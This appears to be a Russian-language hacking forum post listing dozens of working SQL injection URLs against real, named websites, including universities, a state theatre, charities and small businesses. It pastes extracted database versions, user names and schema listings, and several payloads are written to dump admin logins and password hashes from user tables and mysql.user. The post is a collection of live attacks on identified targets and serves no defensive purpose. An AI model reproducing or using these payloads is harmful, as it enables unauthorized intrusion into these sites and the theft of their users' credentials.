SQL Инъекции

PR 4

Code:

http://chgk.com.ru/person.php?id=-113+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,6,7%20--

4.1.25-log
chgkcom2_user@localhost
chgkcom2_chgk

 

Code:

http://www.hamptonrovers.com.au/news/news.php?newsid=-55+union+select+1,2,column_name,4,5,6+from+information_schema.columns+where+table_name=0x7573657273+--

MySQL 5.0.90-community

Code:

http://www.hamptonrovers.com.au/news/news.php?newsid=-55+union+select+1,2,concat_ws(0x3a,id,username,password),4,5,6+from+mymail_users+--

panel:

 

ФОНД-FOREX

Code:

http://www.market-profit.com/news.php?id=-13+%27+union+all+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5--+

 

[email protected]: pages_e3dengine_com:5.0.90-log

 

Internet Money Portal

Code:

http://monitor.newimp.info/news.php?id=-45+%27+union+all+select+1,concat(id_user,0x3a,login,0x3a,haslo,0x3a,mail),3,4+from+users--+

 

www.cide.edu

http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat_ws(char(58),user(),version(),database(),@@version_compile_os)+from+mysql.user+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+


http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat(username,char(58),user_password)+from+bd_mapp.phpbb_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

http://www.cide.edu/investigador/profile.php?IdInvestigador=-179+or(1,1)=(select+count(0),concat((select+concat(user,char(58),password)+from+mysql.user+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+


PR-7

 

Code:

http://www.lannaworld.com/cgi/lannaboard/reply_topic.php?id=-785+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9--

5.1.39-log
lannaworld
[email protected]

Code:

http://classes.dma.ucla.edu/Winter06/161B/projects/ed/DRAview.php?article=-2+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4,5,6,7,8,9,10,11,12,13--

5.0.77
edchao
[email protected]

Code:

http://www.economiaparatodos.com.ar/ver_nota.php?nota=-1+UNION+SELECT+1,concat_Ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+--+

User: uv7450_ept@localhost
Database: ept_v3
Version: 5.0.45-Max-log

Code:

http://www.saltwatercharterswa.com.au/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28user%28%29, database%28%29,version%28%29%29,2,3,4+--+

Version: 5.0.51a-24
User: myswcw1000@ws-shared
Database: netswcwa_saltwatercharterswa_com_au

 

http://www.smu17.ru/story.php?id=-2+union+select+1,group_concat(0x0b,table_name)+from+information_schema.tables--

PR6

http://www1.assumption.edu/admin/hotnews/story.php?id=-2+union+select+1,group_concat(0x0b,name_usr,0x3a,password_usr),3,4,5,6,7,8+from+choir_admin--

http://mortgagehc.com/story.php?id=-2+union+select+1,2,3,group_concat(0x0b,table_name)+from+information_schema.tables--

 

Code:

http://wap.javagames.su/l/d/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user_login,user_name,user_pass,md5_pass,user_email),13,14,15,16,17,18,19,20,21+from+_users+--+/

admin_javagames@localhost
admin_javagames
5.1.14-beta
пароли отдельно в base64 и md5

Code:

http://poly.wao.ru/load/cat/all/0+union+select+1,2,concat_ws(0x3a,user(),database(),version())/

admin_wao_ru@localhost
admin_wao_ru
4.1.20
отображает и сразу редиректит

 

Code:

http://start-ukraine.com/start.php?action=show&lng=ukr&db=news&id=220+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

User: startukrai_1@localhost
Database: startukrai_db
Version: 5.0.89
OS: portbld-freebsd6.2

tables:

Code:

about
akciya
category
contacts
distributors
gazeta
menu
news
prod
product
s_about
s_akciya
s_category
s_contacts
s_distributors
s_gazeta
s_menu
s_news
s_prod
s_product
s_useful
s_user
useful
user
testtable

user:

Code:

user_id,user_login,user_password,user_fname,user_surname,user_lname,user_email,user_info,user_type,user_active

Code:

http://start-ukraine.com/start.php?action=show&lng=ukr&db=news&id=220+union+select+1,concat_ws(0x3a,user_id,user_login,user_password,user_email,user_type),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+user--

 

бля я сёдня пьяный.....выложу что я нарыл

http://www.startmarketing.ru/about-05.php?newsid=57+and+1=2+union+select+concat_ws(0x3a,username,password)+from+opros_users+limit+0,1--

 

www.wri.org

http://earthtrends.wri.org/maps_spatial/index.php?p=2&theme=-5+union+select+1,aes_decrypt(aes_encrypt(concat_ws(char(58),user(),version(),database(),@@version_compile_os),1),1),3,4+from+information_schema.tables/*


PR-8

 

PR 6

Code:

http://www.fullframefest.org/more_film_info.php?id=-74+UNION+SELECT+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20--

5.0.90-community-log
fullfram_admin@localhost
fullfram_films

 

http://www.reg-markets.org/publications/abstract.php?pid=-1127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(logname,char(58),password),15,16,17,18,19+from+admindetails

PR-6

 

http://www.coppades-nepal.org/files/ict_school_detail.php?school_id=-5%20union%20select%201,2,3,4,%28select%20@@version_compile_os%29,6,7

http://www.zhivayaperm.ru/progprint.php?day=-2%27%20union%20select%201,2,3,4,5,concat_ws%280xa,TABLE_SCHEMA,TABLE_NAME%29,7,8,9,10%20from%20information_schema.tables/*

http://www.eltkboys.com/eltk.php?day=-1%20union%20select%20group_concat(table_name),2,3%20from%20information_schema.tables%20where%20table_type=CHAR(66,%2065,%2083,%2069,%2032,%2084,%2065,%2066,%2076,%2069)

 

http://info.web.lehigh.edu/CEE/story.php?id=-2+union+select+1,2,3,4,5,6,group_concat(0x0b,user_name,0x3a,password),8+from+users--

онлайн казино

http://slingogaming.com/slingo_casino_news-story.php?id=-2+union+select+1,group_concat(0x0b,table_name),3,4,5+from+information_schema.tables--


http://www.brentsando.com/bb/story.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4,5,6+from+information_schema.tables--

 

Государственный Академический МАЛЫЙ ТЕАТР

http://www.maly.ru/news_more.php?number=1&day=16&month=6&year=-2010+and+1=2+union+select+1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15+--

version : 4.1.25
user : root@localhost
database : maly
os : portbld-freebsd7.2

http://www.maly.ru/news_more.php?number=1&day=16&month=6&year=-2010+and+1=2+union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user--

 

Первая
http://www.yar-rugby.ru/news.php?id=378+and+1=0+union+select+1,2,concat(username,0x3a,userpass),4,5+from+poll_user--
Таблы:

Code:

CHARACTER_SETS
CLIENT_STATISTICS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
INDEX_STATISTICS
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLE_STATISTICS
TRIGGERS
USER_PRIVILEGES
USER_STATISTICS
VIEWS
galery
gallery
gandbol
media
news
online
players
poll_comment
poll_config
poll_data
poll_index
poll_ip
poll_log
poll_templates
poll_templateset
poll_user
seven

 

Code:

http://www.anglofrenchbedandbreakfast.com/select.php?id=-86+union+select+1,2,3,4,5,6,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20--

Version: 4.1.20-log
User: uAFBB@localhost
Database: dbAFBB

Code:

http://www.glemmtalerhof.at/index.php?id=14+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,13,14,15,16%20--

Version: 5.0.90
User: p16202@localhost
Database: usr_p16202_1

 

http://www.nispa.sk/_portal/conference.php?sid=588&cid=-18+union+select+1,version%28%29,3,4,5,6,7,8%20--
ver. 4.1.22-log
PR-6